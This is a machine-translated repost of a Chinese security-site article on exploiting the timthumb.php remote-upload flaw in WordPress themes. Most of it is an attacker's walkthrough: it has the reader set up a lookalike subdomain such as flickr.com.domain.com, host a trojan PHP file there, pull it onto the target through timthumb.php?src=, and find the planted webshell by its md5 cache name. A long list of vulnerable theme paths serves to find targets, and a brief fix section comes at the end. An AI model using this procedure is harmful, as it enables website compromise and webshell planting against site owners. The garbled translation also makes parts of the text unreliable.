Wordpress thumbnail script timthumb. php vulnerability exploitation (including repair)

Www.2cto.com: it is not a new article, but it is not in the station. It is sent for your reference.
Timthumb. php is a very popular Wordpress thumbnail script. This plug-in is used for some well-known foreign themes, such as Woothemes.
 
The vulnerability is mainly because timthumb defines a whitelist of famous image sharing websites such as Flickr and Picasa by default. Hackers can use timthumb to verify these whitelist vulnerabilities, so that some domain names from such as "http://flickr.com. Domain Name. com", get the permission to upload and execute PHP code. That is to say, if your topic uses timthumb. php to dynamically generate thumbnails. Hackers can use the timthumb vulnerability to upload various malicious programs to your timthumb. the image cache directory defined by php! The main code is in
 
// External domains that are allowed to be displayed on your website
$ AllowedSites = array (
'Flickr. com ',
'Picasa. com ',
'Blogger. com ',
'Wordpress. com ',
'Img .youtube.com ',
);
 
Affected Versions: 1.14-1.32
 
Although this plug-in vulnerability has been published for some time, many new friends like me still do not know how to use it. Now I will summarize my own experiences.
 
I. Preparations
Conditions to be met:
1. Wordpress installed the vulnerability timthumb. php plug-in. Take the theme as an example.
Http: // target website domain name/wp-content/themes/canvas/timthumb. php
Or
Http: // target website domain name/wp-content/themes/canvas/thumb. php
 
2. Create a third-level domain name website with the address
Http://flickr.com. Domain Name. com
Or
Http://picasa.com. Domain Name. com
Upload a trojan here.
 
3. At the beginning of this condition, I did not pay attention to it. The website space must not be able to parse PHP. Otherwise, the trojan will be parsed and the files uploaded to the target website will not be source files, the parsed file.
 
2. Search for the target website
 
There may be few plug-ins installed in China, and many wordpress plug-ins are installed abroad. For example
8q/scripts/timthumb. php
Aerial/lib/timthumb. php
Aesthete/timthumb. php
Albizia/shortdes/timthumb. php
Amphion-lite/script/timthumb. php
Aqua-blue/shortdes/timthumb. php
Arantings/scripts/timthumb. php
Arras/library/timthumb. php
Arras-theme/library/timthumb. php
Arthur emix-bronze/scripts/timthumb. php
Arthur emix-green/scripts/timthumb. php
Artisan/shortdes/timthumb. php
A-simple-business-theme/scripts/timthumb. php
A-supercms/timthumb. php
Aureola/scripts/timthumb. php
Export Rae/timthumb. php
Autofashion/thumb. php
Automotive-blog-theme/Quick Cash Auto/timthumb. php
Automotive-blog-theme/timthumb. php
Bikes/thumb. php
Black_eve/timthumb. php
Blex/scripts/timthumb. php
Bloggnorge-a1/scripts/timthumb. php
Blogified/timthumb. php
Blue-effecate-hyve-theme/timthumb. php
Bluemag/library/timthumb. php
Blue-news/scripts/timthumb. php
Bombax/DES/timthumb. php
Breakingnewz/timthumb. php
Brightsky/scripts/timthumb. php
Brochure-melbourne/DES/timthumb. php
Business-turnkey/assets/js/timthumb. php
Calotropis/DES/timthumb. php
Coffee-lite/thumb. php
Comet/scripts/timthumb. php
Conceditor-wp-strict/scripts/timthumb. php
Constructor/layouts/thumb. php
Constructor/libs/timthumb. php
Constructor/timthumb. php
Coverht-wp/scripts/timthumb. php
Cover-wp/scripts/timthumb. php
Dark-dream-media/timthumb. php
Deep-blue/timthumb. php
Delicate/thumb. php
Diamond-ray/thumb. php
Dieselclothings/thumb. php
Digitalblue/thumb. php
Dimenzion/timthumb. php
Epione/script/timthumb. php
Evr-green/scripts/timthumb. php
Famous/shortframe/megapanel/inc/upload. php
Famous/timthumb. php
Fashion-style/thumb. php
Featuring/timthumb. php
Fliphoto/timthumb. php
Examples/timthumb. php
Fordreporter/scripts/thumb. php
Freeside/thumb. php
Fresh-blu/scripts/timthumb. php
Go-green/modules/timthumb. php
Granite-lite/scripts/timthumb. php
Greydove/timthumb. php
Greyzed/functions/efrog/lib/timthumb. php
Gunungkidul/thumb. php
Heartspotting-beta/thumb. php
Heli-1-wordpress-theme/images/timthumb. php
Ideatheme/timthumb. php
Impressio/timthumb. php
Introvert/thumb. php
Inuit-types/thumb. php
Isotherm-news/thumb. php
Iwana-v10/timthumb. php
Jambo/thumb. php
Jcblackone/thumb. php
Kratalistic/thumb. php
Life-style-free/thumb. php
Likehacker/timthumb. php
Litepress/scripts/timthumb. php
Loganpress-premium-theme-1/thumb. php
Magazine-basic/thumb. php
Magup/timthumb. php
Make-money-online-theme-1/scripts/timthumb. php
Make-money-online-theme-2/scripts/timthumb. php
Make-money-online-theme-3/scripts/timthumb. php
Make-money-online-theme-4/scripts/timthumb. php
Make-money-online-theme/scripts/timthumb. php
Meintest/layouts/thumb. php
Mobilephonecomparision/thumb. php
Moi-magazine/timthumb. php
My-heli/images/timthumb. php
Mymag/timthumb. php
Mystique/extensions/auto-thumb/timthumb. php
Nash/theme-assets/php/timthumb. php
Neofresh/timthumb. php
Neo_wdl/schemdes/extensions/thumb. php
New-green-natural-living-ngnl/scripts/timthumb. php
Newspress/thumb. php
Pearlie/scripts/timthumb. php
Pico/scripts/timthumb. php
Postage-sysydney/shortdes/timthumb. php
Premium-violet/thumb. php
Probluezine/timthumb. php
Pronto/cjl/pronto/uploadify/check. php
Pronto/cjl/pronto/uploadify. php
R755/thumb. php
Regal/timthumb. php
Shaan/timthumb. php
Shadow-block/thumb. php
Shadow/timthumb. php
Simple-but-great/timthumb. php
Simplenews_premium/scripts/timthumb. php
Simple-red-theme/timthumb. php
Simple-tabloid/thumb. php
Simplewhite/timthumb. php
Sshortette/timThumb/timthumb. php
Snowblind_colbert/thumb. php
Snowblind/thumb. php
Spotlight/timthumb. php
Squeezepage/timthumb. php
Standout/thumb. php
Suffusion/timthumb. php
Swift/DES/thumb. php
Swift/DES/timthumb. php
Swift/timthumb. php
Techozoic-fluid/options/thumb. php
The_dark_ OS/tools/timthumb. php
Themetiger-fashion/thumb. php
Theory/thumb. php
The-theme/core/libs/thumbnails/thumb. php
Thrillingtheme/thumb. php
Tm-theme/js/timthumb. php
Totallyred/scripts/timthumb. php
Travelogue-theme/scripts/timthumb. php
True-blue-theme/timthumb. php
Ttnews-theme/timthumb. php
Twittplus/scripts/timthumb. php
Typographywp/timthumb. php
Uugly/timthumb. php
Unity/timthumb. php
Versitility/timthumb. php
Vibefolio-teaser-10/scripts/timthumb. php
Vina/thumb. php
Whitemag/script/thumb. php
Wpapi/thumb. php
Wpbus-d4/shortdes/timthumb. php
Wp-creativix/scripts/timthumb. php
Wp-newsmagazine/scripts/timthumb. php
Wp-perfect/js/timthumb. php
Wp-premium-orange/timthumb. php
Xiando-one/thumb. php
Zcool-like/timthumb. php
Zcool-like/uploadify. php
 
Iii. Start
Enter the address in the browser
Http: // target website path/timthumb. php? Src = http: // http://flickr.com. Domain Name. com/Trojan name. php
 
Then I can
Http://www.bkjia.com/cache/external_md5 value. php
Or
Http: // target website path/temp/external_md5 value. php
 
If the timthumb. php version is earlier than 2.0, the trojan address is
Http: // target website path/cache/md5 value. php
 
Here it should be noted that the md5 value is http: // http://flickr.com. Domain Name. com/Trojan name. php md5 Value
 
Iv. Summary
Although the intrusion through this vulnerability is harsh, many wordpress users outside China and a large number of themes use this plug-in. Therefore, there are still many websites with security risks.
 
Repair Method:
1. Use the latest timthumb. php version to overwrite the original file;
2. Delete the White List;
3. server directory permission settings

From: nuclear'atk Network Security Research Center